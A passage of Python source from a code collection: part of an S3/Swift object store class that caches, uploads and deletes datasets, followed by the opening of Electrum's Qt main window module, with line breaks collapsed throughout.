if not safe_relpath(alt_name): log.warning("alt_name would locate path outside dir: %s", alt_name) raise ObjectInvalid("The requested object is invalid") # alt_name can contain parent directory references, but S3 will not # follow them, so if they are valid we normalize them out alt_name = os.path.normpath(alt_name) rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # for JOB_WORK directory if obj_dir: rel_path = os.path.join(rel_path, str(self._get_object_id(obj))) if base_dir: base = self.extra_dirs.get(base_dir) return os.path.join(base, rel_path) # S3 folders are marked by having trailing '/' so add it now rel_path = f"{rel_path}/" if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat") return rel_path def _get_cache_path(self, rel_path): return os.path.abspath(os.path.join(self.staging_path, rel_path)) def _get_transfer_progress(self): return self.transfer_progress def _get_size_in_s3(self, rel_path): try: key = self._bucket.get_key(rel_path) if key: return key.size except S3ResponseError: log.exception("Could not get size of key '%s' from S3", rel_path) return -1 def _key_exists(self, rel_path): exists = False try: # A hackish way of testing if the rel_path is a folder vs a file is_dir = rel_path[-1] == "/" if is_dir: keyresult = self._bucket.get_all_keys(prefix=rel_path) if len(keyresult) > 0: exists = True else: exists = False else: key = Key(self._bucket, rel_path) exists = key.exists() except S3ResponseError: log.exception("Trouble checking existence of S3 key '%s'", rel_path) return False return exists def _in_cache(self, rel_path): """Check if the given dataset is in the local cache and return True if so.""" # log.debug("------ Checking cache for rel_path %s" % rel_path) cache_path = self._get_cache_path(rel_path) return os.path.exists(cache_path) # TODO: Part of checking if a file is in cache should be to ensure the # size of the cached file matches that on S3. Once the upload tool explicitly # creates, this check sould be implemented- in the mean time, it's not # looking likely to be implementable reliably. # if os.path.exists(cache_path): # # print("***1 %s exists" % cache_path) # if self._key_exists(rel_path): # # print("***2 %s exists in S3" % rel_path) # # Make sure the size in cache is available in its entirety # # print("File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))) # if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path): # # print("***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path) # exists = True # else: # # print("***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path) # exists = False # else: # # Although not perfect decision making, this most likely means # # that the file is currently being uploaded # # print("***3 %s found in cache but not in S3 (in_cache=True)" % cache_path) # exists = True # else: # return False def _pull_into_cache(self, rel_path): # Ensure the cache directory structure exists (e.g., dataset_#_files/) rel_path_dir = os.path.dirname(rel_path) if not os.path.exists(self._get_cache_path(rel_path_dir)): os.makedirs(self._get_cache_path(rel_path_dir)) # Now pull in the file file_ok = self._download(rel_path) self._fix_permissions(self._get_cache_path(rel_path_dir)) return file_ok def _transfer_cb(self, complete, total): self.transfer_progress += 10 def _download(self, rel_path): try: log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) key = self._bucket.get_key(rel_path) # Test if cache is large enough to hold the new file if self.cache_size > 0 and key.size > self.cache_size: log.critical( "File %s is larger (%s) than the cache size (%s). Cannot download.", rel_path, key.size, self.cache_size, ) return False if self.use_axel: log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) ncores = multiprocessing.cpu_count() url = key.generate_url(7200) ret_code = subprocess.call(["axel", "-a", "-n", str(ncores), url]) if ret_code == 0: return True else: log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) self.transfer_progress = 0 # Reset transfer progress counter key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10) return True except S3ResponseError: log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self._bucket.name) return False def _push_to_os(self, rel_path, source_file=None, from_string=None): """ Push the file pointed to by ``rel_path`` to the object store naming the key ``rel_path``. If ``source_file`` is provided, push that file instead while still using ``rel_path`` as the key name. If ``from_string`` is provided, set contents of the file to the value of the string. """ try: source_file = source_file if source_file else self._get_cache_path(rel_path) if os.path.exists(source_file): key = Key(self._bucket, rel_path) if os.path.getsize(source_file) == 0 and key.exists(): log.debug( "Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path ) return True if from_string: key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr) log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path) else: start_time = datetime.now() log.debug( "Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path, ) mb_size = os.path.getsize(source_file) / 1e6 if mb_size < 10 or (not self.multipart): self.transfer_progress = 0 # Reset transfer progress counter key.set_contents_from_filename( source_file, reduced_redundancy=self.use_rr, cb=self._transfer_cb, num_cb=10 ) else: multipart_upload(self.s3server, self._bucket, key.name, source_file, mb_size) end_time = datetime.now() log.debug( "Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)", source_file, rel_path, os.path.getsize(source_file), end_time - start_time, ) return True else: log.error( "Tried updating key '%s' from source file '%s', but source file does not exist.", rel_path, source_file, ) except S3ResponseError: log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file) raise return False def file_ready(self, obj, **kwargs): """ A helper method that checks if a file corresponding to a dataset is ready and available to be used. Return ``True`` if so, ``False`` otherwise. """ rel_path = self._construct_path(obj, **kwargs) # Make sure the size in cache is available in its entirety if self._in_cache(rel_path): if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path): return True log.debug( "Waiting for dataset %s to transfer from OS: %s/%s", rel_path, os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path), ) return False def _exists(self, obj, **kwargs): in_cache = in_s3 = False rel_path = self._construct_path(obj, **kwargs) # Check cache if self._in_cache(rel_path): in_cache = True # Check S3 in_s3 = self._key_exists(rel_path) # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3)) # dir_only does not get synced so shortcut the decision dir_only = kwargs.get("dir_only", False) base_dir = kwargs.get("base_dir", None) if dir_only: if in_cache or in_s3: return True # for JOB_WORK directory elif base_dir: if not os.path.exists(rel_path): os.makedirs(rel_path) return True else: return False # TODO: Sync should probably not be done here. Add this to an async upload stack? if in_cache and not in_s3: self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path)) return True elif in_s3: return True else: return False def _create(self, obj, **kwargs): if not self._exists(obj, **kwargs): # Pull out locally used fields extra_dir = kwargs.get("extra_dir", None) extra_dir_at_root = kwargs.get("extra_dir_at_root", False) dir_only = kwargs.get("dir_only", False) alt_name = kwargs.get("alt_name", None) # Construct hashed path rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) # Optionally append extra_dir if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # Create given directory in cache cache_dir = os.path.join(self.staging_path, rel_path) if not os.path.exists(cache_dir): os.makedirs(cache_dir) # Although not really necessary to create S3 folders (because S3 has # flat namespace), do so for consistency with the regular file system # S3 folders are marked by having trailing '/' so add it now # s3_dir = '%s/' % rel_path # self._push_to_os(s3_dir, from_string='') # If instructed, create the dataset in cache & in S3 if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat") open(os.path.join(self.staging_path, rel_path), "w").close() self._push_to_os(rel_path, from_string="") def _empty(self, obj, **kwargs): if self._exists(obj, **kwargs): return bool(self._size(obj, **kwargs) > 0) else: raise ObjectNotFound("objectstore.empty, object does not exist: %s, kwargs: %s" % (str(obj), str(kwargs))) def _size(self, obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) if self._in_cache(rel_path): try: return os.path.getsize(self._get_cache_path(rel_path)) except OSError as ex: log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex) elif self._exists(obj, **kwargs): return self._get_size_in_s3(rel_path) log.warning("Did not find dataset '%s', returning 0 for size", rel_path) return 0 def _delete(self, obj, entire_dir=False, **kwargs): rel_path = self._construct_path(obj, **kwargs) extra_dir = kwargs.get("extra_dir", None) base_dir = kwargs.get("base_dir", None) dir_only = kwargs.get("dir_only", False) obj_dir = kwargs.get("obj_dir", False) try: # Remove temparory data in JOB_WORK directory if base_dir and dir_only and obj_dir: shutil.rmtree(os.path.abspath(rel_path)) return True # For the case of extra_files, because we don't have a reference to # individual files/keys we need to remove the entire directory structure # with all the files in it. This is easy for the local file system, # but requires iterating through each individual key in S3 and deleing it. if entire_dir and extra_dir: shutil.rmtree(self._get_cache_path(rel_path), ignore_errors=True) results = self._bucket.get_all_keys(prefix=rel_path) for key in results: log.debug("Deleting key %s", key.name) key.delete() return True else: # Delete from cache first unlink(self._get_cache_path(rel_path), ignore_errors=True) # Delete from S3 as well if self._key_exists(rel_path): key = Key(self._bucket, rel_path) log.debug("Deleting key %s", key.name) key.delete() return True except S3ResponseError: log.exception("Could not delete key '%s' from S3", rel_path) except OSError: log.exception("%s delete error", self._get_filename(obj, **kwargs)) return False def _get_data(self, obj, start=0, count=-1, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Check cache first and get file if not there if not self._in_cache(rel_path): self._pull_into_cache(rel_path) # Read the file content from cache data_file = open(self._get_cache_path(rel_path)) data_file.seek(start) content = data_file.read(count) data_file.close() return content def _get_filename(self, obj, **kwargs): base_dir = kwargs.get("base_dir", None) dir_only = kwargs.get("dir_only", False) obj_dir = kwargs.get("obj_dir", False) rel_path = self._construct_path(obj, **kwargs) # for JOB_WORK directory if base_dir and dir_only and obj_dir: return os.path.abspath(rel_path) cache_path = self._get_cache_path(rel_path) # S3 does not recognize directories as files so cannot check if those exist. # So, if checking dir only, ensure given dir exists in cache and return # the expected cache path. # dir_only = kwargs.get('dir_only', False) # if dir_only: # if not os.path.exists(cache_path): # os.makedirs(cache_path) # return cache_path # Check if the file exists in the cache first if self._in_cache(rel_path): return cache_path # Check if the file exists in persistent storage and, if it does, pull it into cache elif self._exists(obj, **kwargs): if dir_only: # Directories do not get pulled into cache return cache_path else: if self._pull_into_cache(rel_path): return cache_path # For the case of retrieving a directory only, return the expected path # even if it does not exist. # if dir_only: # return cache_path raise ObjectNotFound("objectstore.get_filename, no cache_path: %s, kwargs: %s" % (str(obj), str(kwargs))) # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path def _update_from_file(self, obj, file_name=None, create=False, **kwargs): if create: self._create(obj, **kwargs) if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Chose whether to use the dataset file itself or an alternate file if file_name: source_file = os.path.abspath(file_name) # Copy into cache cache_file = self._get_cache_path(rel_path) try: if source_file != cache_file: # FIXME? Should this be a `move`? shutil.copy2(source_file, cache_file) self._fix_permissions(cache_file) except OSError: log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file) else: source_file = self._get_cache_path(rel_path) # Update the file on S3 self._push_to_os(rel_path, source_file) else: raise ObjectNotFound( "objectstore.update_from_file, object does not exist: %s, kwargs: %s" % (str(obj), str(kwargs)) ) def _get_object_url(self, obj, **kwargs): if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) try: key = Key(self._bucket, rel_path) return key.generate_url(expires_in=86400) # 24hrs except S3ResponseError: log.exception("Trouble generating URL for dataset '%s'", rel_path) return None def _get_store_usage_percent(self): return 0.0 def shutdown(self): self.running = False thread = getattr(self, "cache_monitor_thread", None) if thread: log.debug("Shutting down thread") self.sleeper.wake() thread.join(5) class SwiftObjectStore(S3ObjectStore): """ Object store that stores objects as items in a Swift bucket. A local cache exists that is used as an intermediate location for files between Galaxy and Swift. """ store_type = "swift" def _configure_connection(self): log.debug("Configuring Swift Connection") self.conn = boto.connect_s3( aws_access_key_id=self.access_key, aws_secret_access_key=self.secret_key, is_secure=self.is_secure, host=self.host, port=self.port, calling_format=boto.s3.connection.OrdinaryCallingFormat(), path=self.conn_path, )
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING, Sequence, List, Union from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtCore import QTimer from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog, QMenu, QAction, QStackedWidget, QToolButton) import electrum from electrum import (keystore, ecc, constants, util, bitcoin, commands, paymentrequest, lnutil) from electrum.bitcoin import COIN, is_address from electrum.plugin import run_hook, BasePlugin from electrum.i18n import _ from electrum.util import (format_time, UserCancelled, profiler, bh2u, bfh, InvalidPassword, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs, AddTransactionException, BITCOIN_BIP21_URI_SCHEME) from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice from electrum.transaction import (Transaction, PartialTxInput, PartialTransaction, PartialTxOutput) from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption, CannotDoubleSpendTx, CannotCPFP) from electrum.version import ELECTRUM_VERSION from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError, NetworkException) from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError from electrum.lnaddr import lndecode, LnDecodeException from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider, FeeComboBox from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen, TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT, getOpenFileName, getSaveFileName, BlockingWaitingDialog) from .util import ButtonsTextEdit, ButtonsLineEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList from .confirm_tx_dialog import ConfirmTxDialog from .transaction_dialog import PreviewTxDialog from .rbf_dialog import BumpFeeDialog, DSCancelDialog if TYPE_CHECKING: from . import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QToolButton): # note: this class has a custom stylesheet applied in stylesheet_patcher.py def __init__(self, icon, tooltip, func): QToolButton.__init__(self) self.setText('') self.setIcon(icon) self.setToolTip(tooltip) self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon) self.setAutoRaise(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]: self.func() def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() show_error_signal = pyqtSignal(str) payment_request: Optional[paymentrequest.PaymentRequest] def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread assert wallet, "no wallet" self.wallet = wallet if wallet.has_lightning(): self.wallet.config.set_key('show_channels_tab', True) self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.pluginsdialog = None self.showing_cert_mismatch_error = False self.tl_windows = [] self.pending_invoice = None Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.completions = QStringListModel() coincontrol_sb = self.create_coincontrol_statusbar() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) central_widget = QWidget() vbox = QVBoxLayout(central_widget) vbox.setContentsMargins(0, 0, 0, 0) vbox.addWidget(tabs) vbox.addWidget(coincontrol_sb) self.setCentralWidget(central_widget) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.show_error_signal.connect(self.show_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels_updated', 'payment_failed', 'payment_succeeded', 'invoice_status', 'request_status', 'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... util.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback #self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... # anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') self.wallet.thread = None run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, 